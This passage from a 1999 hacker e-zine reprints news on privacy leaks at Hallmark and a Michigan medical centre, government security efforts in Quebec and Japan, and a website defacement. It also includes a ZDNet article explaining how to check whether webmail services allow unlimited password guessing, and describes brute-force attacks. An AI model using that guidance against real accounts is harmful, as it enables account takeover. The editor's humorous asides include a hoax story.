they do it!? Despite consisting of a nice layout and some great content,
Project Gamma has remained one of the more hidden underground sites.
Having come from solid background as a division of Gamma Force, it's
slowly grown into a widely respected resource..
It's current membership stands at a healthy five, with the webmaster,
WHiTe VaMPiRe, working non-stop to keep everything working smoothly. The
site includes some good news content, specifically targeted at the
underground and some great extras such as the Top100 and webrings.
I spoke to him and asked him what it was that compelled him to work as
hard as he does, and like a seasoned spokesperson, he replied with an almost
scripted answer.. "I'm just trying to make the most out of my time online."
We all know the truth of being an admin of any site, is the attention we get
from the opposite sex..!
This site deserves more visitors, so if you've got to see one site today,
why not make it this one!?
Links: http://www.projectgamma.com/
http://www.gammaforce.org/
Have your say: qubik@bikkel.com
cc: hwa@press.usmc.net
@HWA
9.0 Secret Cyber Sex; Gary, your secret is out!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Via HNN Source: Nando Times, Kansas City Star
Nando: http://www.techserver.com/story/0,1643,17514-28909-212134-0,00.html
KCS: http://www.kcstar.com/item/pages/home.pat,local/30dabe6b.211,.html
This is gawd knows how many times in recent weeks that a "misconfigured"
search engine has spewed out data to netizens that was intended to be on
secure servers or at least supposedly stored in confidence, this time
Hallmark sucks the bullet for this boner:
Hallmark computer glitch sends intimate online
greetings into public cyberspace
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
KANSAS CITY, Mo. (February 12, 1999 7:50 a.m. EST http://www.nandotimes.com) - The lovers and
flirts sending e-mail Valentines and other notes on Hallmark Cards' online site no doubt
intended their musings to be perused only by that special someone.
Unwittingly, they had a potential audience of millions.
A programming error at hallmark.com allowed anyone with a computer and some curiosity to
search the Web site for private love notes - and, in many cases, the senders' name, home and
e-mail addresses and place of employment.
The security breach surprised customers and executives at the Kansas City-based company,
which this week scrambled to modify the computer program after The Kansas City Star
reported the problem. Technicians have since deleted all of the old messages.
A Hallmark official said the problem involved only greetings sent a year or more ago.
"It was a programming error," company spokeswoman Julie O'Dell said. "We certainly are
committed to providing privacy."
The recipient of a cyber Hallmark greeting card first gets an e-mail from the company, including
a password. Then he or she clicks on a Web address to view the card.
But until this week, all those messages were available to anyone who used the site's search
engine, the newspaper reported. That means if the word "bear" was typed, for example,
Hallmark's computer would have given you a list of Web pages including that word - including
one page featuring a sweet message from "Teddy Bear" to his "Honey."
"I had no idea," said Gary Harders of Chicago, who sent one of the cards to his wife. "I
assumed it was private.
"It defeats the whole purpose of sending somebody a personal card if everybody and his
brother is going to get ahold of it. It could be embarrassing."
O'Dell said she had no idea how many people might have clicked through the greetings.
"This new system has, built in, a new standard to ensure this kind of thing doesn't happen
again," she said. "We don't want a lot of people worried. None of the recent electronic
greetings were in that file."
According to the Star, some of the messages were obviously not meant for mass consumption.
Among them:
- "Gary & I have been having secret cyber sex via computer."
- "I've seen you swing a sledge hammer and the way your muscles ripple ... is amazing."
- "You deserve an extra foot massage tonight!"
Another writer e-mailed an intimate message and a photo of a flower to a woman friend, trying
to entice her into a romantic rendezvous.
"You will have the greatest time you've had in 15 years," he assured his friend - unless the other
man in her life persuaded her to stay home with him and their children instead.
@HWA
10.0 Mr. Lewis, your kidney is out!, 'but but i'm DYIN over here'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Laugh
~~~~~
In a frightening real-life drama that played out over the net in front of
approximately 3000 university BS laureates, Mr Donald Lewis 57 had his
kidney removed by accident when a malicious cracker re-wrote his scheduled
hemmorhoidal clippage to be performed for 'University Web TV' an outfit that
doesn't really exist because this article is full of shit, had ya going there
huh? well the scary truth follows: taken from Nando times: (via HNN)
Don't laugh
~~~~~~~~~~~
Michigan medical records accidentally posted on Web
for two months
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
ANN ARBOR, Mich. (February 12, 1999 12:22 a.m. EST http://www.nandotimes.com)
- Several thousand patient records at the University of Michigan Medical Center
were available through public Internet sites for two months.
"Luckily, we were notified and able to stop it this time before real damage was
done," spokesman Dave Wilkins said. "Still, on all fronts, we're taking it very
seriously."
The problem was discovered Monday when a university student searching for information
about a doctor on the medical center's Web site was linked to files containing private
patient records.
The records contained names, addresses, phone numbers, Social Security numbers,
employment status, treatments for specific medical conditions and other data. The
information was used to schedule appointments, Wilkins said.
No one accessed the records until Monday, he said.
"I'm certainly not happy about it," said Cary Johnson, a nurse at the medical center whose
2-year-old son's record was exposed. "I guess technology is helping us to do some things and
hurting us in other ways."
(Sounds like a real pain in the ass ... this reminds me of a time way back in the 80's
when a local drugstore kindly donated an old Ohio Scientific multi-processor 6502
based machine with a 17" winchester drive in it, complete with medical records, to
my computer collection, so much for privacy, guess we haven't come much further
in regards to people's medical record privacy today. I mean sure I have an honest
face but... maybe someday i'll put that box on the net, or perhaps it would make
a great bar fridge or safe housing..hrm..but I digress. - Ed)
@HWA
11.0 Free email account vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I've mentioned before that Hotmail and the like are not anonymous services and it
should come as no surprise to anyone that they are also likely targets for crackers
and are probably (I wouldn't know *g*) full of security holes. The biggest "hole"
is that unlimited password attempts are allowed and anyone with a real determination
to get in that knows anything at all about the target will probably succeed..eventually
there are other vulnerabilities beyond the scope of this article that are not discussed
and imho more frightening but basically if you want "secure" email ENCRYPT it, if you
want anonymity, use nightmail or a remailer but that involves some work on your part.
- Ed nightmail ( www.nightmail.com, pretty "anonymous" but full of pr0n banners etc)
http://chkpt.zdnet.com/chkpt/zdnu99021301/www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2205746,00.html
Freemail Vulnerabilities
If you have an account on Hotmail, Yahoo!, or Excite, it's vulnerable to hackers.
By Ira Winkler February 10, 1999
Free email services are a common feature on portal sites, but some of them have serious
security vulnerabilities-- specifically, Yahoo! Mail, Excite Mail, and Hotmail.
First, these three services allow an unlimited number of log-on attempts. This means that
malicious Internet users can perform password guessing and "brute force" password attacks
against accounts on those systems. (After three failed log-in attempts, Yahoo! does ask the
supposed user if they require help. However, additional log-in attempts are not prevented.)
Second, the user is not notified when a number of failed log-in attempts have occurred. If a
password attack had been attempted against a user account, the user has no way of knowing.
These vulnerabilities affect a lot of Internet surfers. Free email services are extremely
popular as a Web-based alternative to regular Internet service provider accounts. The ability to
access mail from any Web browser and a certain level of Internet anonymity are great advantages
that these accounts offer. Security, however, is a distinct disadvantage.
The problems probably are not limited to Yahoo!, Excite, and Hotmail. To test whether a particular
site is vulnerable to a brute-force attack, simply try entering incorrect passwords. If the system
allows more than ten invalid password entries without locking out the account, then it probably
allows an unlimited number of password-cracking attempts.
Password crackers attempt to obtain an account's password by exhaustively guessing
word and number combinations. For example, an attacker may use a dictionary as the source of
words. More sophisticated password crackers will use word-and-number combinations, such as
star99. The most time-consuming technique is to try every possible combination of letters,
numbers, and special characters. Such attacks can easily be automated. Password cracking is
an extremely common hacker technique.
To prevent brute-force attacks, a security function should lock an account after an
excessive number of failed log-in attempts, typically three to five. Once an account is
locked, the user should be emailed about the failed log-in attempts and told to contact the
system administrators, who will verify the user's identity. While this would cause a temporary
interruption of service, it would prevent the account from being compromised. This is a
basic security practice that is built into most computer operating systems.
Admittedly, these vulnerabilities are extremely basic. I was not expecting them to exist on all
the systems I examined. I take their presence as an indication that security was not a crucial step
in designing these systems.
While the sites all state that users should choose their passwords well, they do not
account for attacks that can compromise even the best passwords. This leaves users, who
number in the thousands or even hundreds of thousands (industry numbers measure accounts,
not the number of users), vulnerable to someone with even trivial programming and hacking skills.
While no attacks have been reported, it is likely that they were attempted. It is also a given that
they will be attempted and successful unless action is taken.
I contacted Yahoo! and Excite press liaisons about this issue and received no official reply.
Hotmail could not be reached by telephone, and email messages to its technical support groups
were not returned.
continued at the site ...
http://chkpt.zdnet.com/chkpt/zdnu99021301/www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2205746,00.html
@HWA
12.0 Quebec poses hacker challenge to its open networks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Seen on HNN: contributed to HNN by Frenchie
Montreal Gazette: http://www.montrealgazette.com/PAGES/990211/2266737.html
Yahoo News- French Version : http://biz.yahoo.com/rf/990210/bjo.html
QUEBEC WANTS CHALLENGERS TO TEST ITS COMPUTER SECURITY
PAUL CHERRY
The Gazette
The provincial government is to enlist hackers to test the security
of its information networks.
A laboratory will be set up using the same computers - standard
desktops with 400 megahertz Intel processors - used by many
government services "as well as those used by hackers,"
Paul-Andre Comeau, president of the province's Access to
Information Commission, said yesterday.
The aim is inform people in charge of computers of recent
innovations and of the relative advantages or disadvantages of
new gadgets.
"We will also be able to check out how safe the systems can be
and how they can be improved," Comeau said.
"In that respect, of course, we will have to be helped by outside
people and, at times, like the RCMP does in
Ottawa, by hackers who are converted."
Comeau said reformed hackers are referred to as "white
hackers" by the people who now hire them to protect systems.
A 24-year-old former hacker, interviewed by The Gazette last
week, now protects an international computer network based in
Montreal.
When he was 15, he was able to infiltrate Russian research
computers - until he was caught and agreed to lecture RCMP
staff on how hackers crack government systems to get
information.
Comeau said someone tried for hours to hack into the
commission's network two years ago, on a Saturday afternoon.
He said the demand for the extra protection has come not from
the larger government ministries and organizations, but from
smaller ones that are now trying to modernize and join
established computer networks.
Another objective of the laboratory is to advise government
services on what types of equipment to buy.
Even simple things like fax machines should be considered with
security in mind, Comeau said.
He said the committee is advising government services against
sending personal information via faxes, except in exceptional
circumstances and after taking precautionary steps.
"We hope that in the coming year,
we will be able to advise hospitals and social institutions to do
their own evaluation of their systems," he said, adding that a lot
of money is about
to be invested in new information systems.
The laboratory will also examine the safety of equipment used
for sharing data among institutions like hospitals and municipal
administrations, which keep information that falls under privacy
laws.
©1998 The Gazette, a division of Southam Inc.
@HWA
13.0 News from Tokyo
~~~~~~~~~~~~~~~
Contributed by Wile, source: Associated Press (c) 1999 AP
TOKYO (AP) At a secret location somewhere in Tokyo, dozens
†† of specialists in cryptography and electronic media will soon be
† hard at work patrolling cyberspace.
†† Due to open by July, the new headquarters for the National Police
†† Agency's ``cyber-cop'' squad signals growing concern about
†† computer security as more and more Japanese join the global
†† online revolution.
†† And while unauthorized computer snooping in Japan is less
†† common than in the United States, a sharp jump in
†† computer-related crimes in recent years has rattled authorities.
†† The increase is no surprise legally, Japan is a hacker's heaven.
†† Breaking into a computer system isn't even a crime in Japan,
†† which sets it apart from most other major industrialized nations.
†† Hackers are free to peep at sensitive data stored in Japanese
†† mainframes so long as they don't destroy or sell any of it.
†† ``We have fallen behind other countries in this area,'' said Kei
†† Hata, a member of Parliament who serves as deputy head of the
†† ruling party's Internet policy committee. ``It's a problem which
†† must be addressed quickly.''
†† Worry about the potential for computer-generated chaos has
†† prompted Tokyo to draft legislation to outlaw unauthorized
†† access. A bill is expected to be submitted in the current session of
†† Parliament, which ends in June.
†† The move comes amid pressure from Washington to bolster
†† international efforts to fight crime in cyberspace and dismay in
†† Japan over abuses such as the widespread transmission of child
†† pornography and even poison sales via suicide-related Websites.
†† The problem is still relatively new to Japan.
†† In 1997, the number of high-tech crimes known to Japanese police
†† climbed to 263, up from 178 the previous year and just 32 in
†† 1993.
†† Still, a recent NPA survey showed that only 4 percent of
†† companies and colleges polled reported cases of unauthorized
†† access serious enough to inflict damage on their computer
†† systems.
†† By comparison, the San Francisco-based Computer Security
†† Institute and the FBI found that 64 percent of 520 U.S.
†† corporations, government agencies, financial institutions and
†† universities responding to a 1998 survey had at least one
†† computer security violation within the previous 12 months. More
†† than 70 percent suffered financial losses.
†† Japanese police suspect the true number of computer crimes is
†† much higher than the official figure, and note that many
†† businesses keep security problems under wraps to avoid negative
†† publicity.
†† Companies are particularly reluctant to disclose entanglements
†† with organized crime syndicates, known as the yakuza.
†† ``The yakuza have moved into this field,'' said Shunichi Kawabe,
†† an official in the NPA's information technology bureau. ``They are
†† very interested in making money in this type of business.''
†† He said Internet-brokered gun trafficking, Web page-based
†† pornography distribution and computer-generated financial fraud
†† are among the areas suspected of being targeted.
† Thrill-seekers are also stirring up trouble.
†† One hacker broke into a computer network used by the Hokkaido
†† University of Education in northern Japan and gained access to
†† login IDs and passwords used by about 1,000 employees and
†† students. The university uncovered the security breach last
†† month and shut down the entire network.
†† Japan plans to step up computer training programs for police, but
†† authorities acknowledge they have a long way to go before
†† catching up with their counterparts in the United States.
†† The good news for the cops is that Japanese hackers also lag
†† behind their cohorts overseas.
†† ``Domestic cyber-criminals are still low-tech,'' said Kawabe.
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~
HNN: contributed by telephrk (via HNN http://www.hackernews.com/)
Jordon Cracked
This is presumably the first web site crack in the country of
Jordan.
http://www.go.com.jo
A.0 APPENDICES
~~~~~~~~~~
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news
(r) Cruciphux is a trade mark of Harpies With Ailments corp.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
Hackerz Without Attitudez Information Warfare Alliance Website
Opening soon:
www.hwa-iwa.org
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]